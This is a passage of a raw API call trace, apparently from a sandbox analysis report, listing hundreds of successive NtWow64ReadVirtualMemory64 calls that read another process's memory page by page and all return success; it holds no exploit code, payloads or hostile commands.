BufferSize=0xb39000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0a000, Buffer=0x7ffb, BufferSize=0xb3a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0b000, Buffer=0x7ffb, BufferSize=0xb3b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0c000, Buffer=0x7ffb, BufferSize=0xb3c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0d000, Buffer=0x7ffb, BufferSize=0xb3d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0e000, Buffer=0x7ffb, BufferSize=0xb3e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0f000, Buffer=0x7ffb, BufferSize=0xb3f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b10000, Buffer=0x7ffb, BufferSize=0xb40000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b11000, Buffer=0x7ffb, BufferSize=0xb41000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b12000, Buffer=0x7ffb, BufferSize=0xb42000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b13000, Buffer=0x7ffb, BufferSize=0xb43000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b14000, Buffer=0x7ffb, BufferSize=0xb44000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b15000, Buffer=0x7ffb, BufferSize=0xb45000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b16000, Buffer=0x7ffb, BufferSize=0xb46000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b17000, Buffer=0x7ffb, BufferSize=0xb47000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b18000, Buffer=0x7ffb, BufferSize=0xb48000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b19000, Buffer=0x7ffb, BufferSize=0xb49000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1a000, Buffer=0x7ffb, BufferSize=0xb4a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1b000, Buffer=0x7ffb, BufferSize=0xb4b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1c000, Buffer=0x7ffb, BufferSize=0xb4c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1d000, Buffer=0x7ffb, BufferSize=0xb4d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1e000, Buffer=0x7ffb, BufferSize=0xb4e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1f000, Buffer=0x7ffb, BufferSize=0xb4f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b20000, Buffer=0x7ffb, BufferSize=0xb50000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b21000, Buffer=0x7ffb, BufferSize=0xb51000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b22000, Buffer=0x7ffb, BufferSize=0xb52000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b23000, Buffer=0x7ffb, BufferSize=0xb53000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b24000, Buffer=0x7ffb, BufferSize=0xb54000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b25000, Buffer=0x7ffb, BufferSize=0xb55000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b26000, Buffer=0x7ffb, BufferSize=0xb56000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b27000, Buffer=0x7ffb, BufferSize=0xb57000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b28000, Buffer=0x7ffb, BufferSize=0xb58000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b29000, Buffer=0x7ffb, BufferSize=0xb59000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2a000, Buffer=0x7ffb, BufferSize=0xb5a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2b000, Buffer=0x7ffb, BufferSize=0xb5b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2c000, Buffer=0x7ffb, BufferSize=0xb5c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2d000, Buffer=0x7ffb, BufferSize=0xb5d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2e000, Buffer=0x7ffb, BufferSize=0xb5e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2f000, Buffer=0x7ffb, BufferSize=0xb5f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b30000, Buffer=0x7ffb, BufferSize=0xb60000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b31000, Buffer=0x7ffb, BufferSize=0xb61000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b32000, Buffer=0x7ffb, BufferSize=0xb62000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b33000, Buffer=0x7ffb, BufferSize=0xb63000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b34000, Buffer=0x7ffb, BufferSize=0xb64000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b35000, Buffer=0x7ffb, BufferSize=0xb65000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b36000, Buffer=0x7ffb, BufferSize=0xb66000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b37000, Buffer=0x7ffb, BufferSize=0xb67000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b38000, Buffer=0x7ffb, BufferSize=0xb68000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b39000, Buffer=0x7ffb, BufferSize=0xb69000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3a000, Buffer=0x7ffb, BufferSize=0xb6a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3b000, Buffer=0x7ffb, BufferSize=0xb6b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3c000, Buffer=0x7ffb, BufferSize=0xb6c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3d000, Buffer=0x7ffb, BufferSize=0xb6d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3e000, Buffer=0x7ffb, BufferSize=0xb6e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3f000, Buffer=0x7ffb, BufferSize=0xb6f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.849] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b40000, Buffer=0x7ffb, BufferSize=0xb70000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.849] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b41000, Buffer=0x7ffb, BufferSize=0xb71000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.849] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b42000, Buffer=0x7ffb, BufferSize=0xb72000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b43000, Buffer=0x7ffb, BufferSize=0xb73000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b44000, Buffer=0x7ffb, BufferSize=0xb74000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b45000, Buffer=0x7ffb, BufferSize=0xb75000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b46000, Buffer=0x7ffb, BufferSize=0xb76000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.851] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b47000, Buffer=0x7ffb, BufferSize=0xb77000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.851] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b48000, Buffer=0x7ffb, BufferSize=0xb78000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.851] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b49000, Buffer=0x7ffb, BufferSize=0xb79000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.852] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4a000, Buffer=0x7ffb, BufferSize=0xb7a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.852] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4b000, Buffer=0x7ffb, BufferSize=0xb7b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.852] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4c000, Buffer=0x7ffb, BufferSize=0xb7c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.852] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4d000, Buffer=0x7ffb, BufferSize=0xb7d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.853] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4e000, Buffer=0x7ffb, BufferSize=0xb7e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.853] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4f000, Buffer=0x7ffb, BufferSize=0xb7f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.853] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b50000, Buffer=0x7ffb, BufferSize=0xb80000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.853] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b51000, Buffer=0x7ffb, BufferSize=0xb81000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.854] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b52000, Buffer=0x7ffb, BufferSize=0xb82000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.854] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b53000, Buffer=0x7ffb, BufferSize=0xb83000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.854] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b54000, Buffer=0x7ffb, BufferSize=0xb84000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.855] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b55000, Buffer=0x7ffb, BufferSize=0xb85000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.856] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b56000, Buffer=0x7ffb, BufferSize=0xb86000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.856] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b57000, Buffer=0x7ffb, BufferSize=0xb87000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.856] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b58000, Buffer=0x7ffb, BufferSize=0xb88000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.856] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b59000, Buffer=0x7ffb, BufferSize=0xb89000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.857] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5a000, Buffer=0x7ffb, BufferSize=0xb8a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.857] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5b000, Buffer=0x7ffb, BufferSize=0xb8b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.857] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5c000, Buffer=0x7ffb, BufferSize=0xb8c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.858] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5d000, Buffer=0x7ffb, BufferSize=0xb8d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.858] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5e000, Buffer=0x7ffb, BufferSize=0xb8e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.858] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5f000, Buffer=0x7ffb, BufferSize=0xb8f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.859] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b60000, Buffer=0x7ffb, BufferSize=0xb90000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.859] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b61000, Buffer=0x7ffb, BufferSize=0xb91000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.859] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b62000, Buffer=0x7ffb, BufferSize=0xb92000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.859] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b63000, Buffer=0x7ffb, BufferSize=0xb93000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.860] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b64000, Buffer=0x7ffb, BufferSize=0xb94000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.860] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b65000, Buffer=0x7ffb, BufferSize=0xb95000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.861] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b66000, Buffer=0x7ffb, BufferSize=0xb96000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.861] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b67000, Buffer=0x7ffb, BufferSize=0xb97000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.861] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b68000, Buffer=0x7ffb, BufferSize=0xb98000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.862] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b69000, Buffer=0x7ffb, BufferSize=0xb99000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.862] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6a000, Buffer=0x7ffb, BufferSize=0xb9a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.862] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6b000, Buffer=0x7ffb, BufferSize=0xb9b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.863] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6c000, Buffer=0x7ffb, BufferSize=0xb9c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.863] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6d000, Buffer=0x7ffb, BufferSize=0xb9d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.903] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6e000, Buffer=0x7ffb, BufferSize=0xb9e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.903] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6f000, Buffer=0x7ffb, BufferSize=0xb9f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.904] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b70000, Buffer=0x7ffb, BufferSize=0xba0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.904] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b71000, Buffer=0x7ffb, BufferSize=0xba1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.904] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b72000, Buffer=0x7ffb, BufferSize=0xba2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.905] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b73000, Buffer=0x7ffb, BufferSize=0xba3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.905] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b74000, Buffer=0x7ffb, BufferSize=0xba4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.905] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b75000, Buffer=0x7ffb, BufferSize=0xba5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.906] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b76000, Buffer=0x7ffb, BufferSize=0xba6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.906] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b77000, Buffer=0x7ffb, BufferSize=0xba7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.906] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b78000, Buffer=0x7ffb, BufferSize=0xba8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.907] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b79000, Buffer=0x7ffb, BufferSize=0xba9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.907] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7a000, Buffer=0x7ffb, BufferSize=0xbaa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.907] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7b000, Buffer=0x7ffb, BufferSize=0xbab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.908] NtWow64ReadVirtualMemory64 (in: 